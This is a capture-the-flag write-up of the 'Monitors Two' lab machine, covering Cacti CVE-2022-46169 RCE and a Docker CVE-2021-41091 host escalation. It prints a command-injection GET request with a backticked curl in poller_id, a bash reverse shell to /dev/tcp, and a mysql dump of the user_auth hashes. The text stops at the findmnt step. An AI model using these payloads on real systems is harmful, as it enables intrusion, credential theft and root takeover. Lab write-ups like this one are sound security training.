Monitors Two involved exploiting cacti which was vulnerable to un-aunthenticated remote code execution (CVE-2022–46169) which returns a shell as www-data in a docker container, escalating privileges to root through capsh on the container and then getting root on the host by abusing CVE-2021-41091, which is a flaw in docker engine allowing users to execute files from docker images.
NMAP
Nmap scan report for 10.10.11.211
Host is up (0.10s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
| 256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_ 256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Login to Cacti
|_http-favicon: Unknown favicon MD5: 4F12CCCD3C42A4A478F067337FE92794
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelPORT 80 (HTTP)
Trying the default creds for catci admin:adminand admin:cactipw which didn't work
On searching for vulnerabilities related to cacti 1.2.22, there’s an un-aunthenticated rce ( CVE-2022–46169)
Foothold
We can reproduce this by just using the GET request to get a hit on our webserver to confirm that it’s working
GET /remote_agent.php?action=polldata&local_data_ids[0]=6&host_id=1&poller_id=`curl+10.10.14.142` HTTP/1.1
Host: 10.10.11.211
X-Forwarded-For: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Cacti=b7c2b58f33ea788f827a4d4bbe435deb; CactiDateTime=Thu May 04 2023 20:36:02 GMT+0500; CactiTimeZone=300
Upgrade-Insecure-Requests: 1We can get a reverse shell using bash payload
/bin/bash -c "bash -i >& /dev/tcp/10.10.14.142/2222 0>&1"Checking the hostname reveals that we are in a docker container
Privilege Escalation (marcus)
Reading the entrypoint.sh file, we can find the mysql creds which are root:root
From here querying the users from user_auth table
mysql --host=db --user=root --password=root -e "use cacti;show tables; select * from user_auth;"Cracking these two hashes out of which we’ll get marcus’s hash cracked
Reading the mail from /var/mail/marcus
From the mail it talks about there CVEs for which CVE-2021-41091 stands out as the docker version on this machine is 20.10.5
There’s a really nice article on how to abuse this and the short summary is this, we need to have bash or any binary that may spawn bash as root user and then from the host machine, access the overlay filesystem of that docker container and execute the binary will grant us root privileges on the host
Since we are not root on the actual host we can’t just spawn bash into the container and make bash a SUID, running linpeas on the docker container, capsh has SUID bit set which means we can spawn bash as a root user
After doing this, run findmnt to find the docker container's filesystem
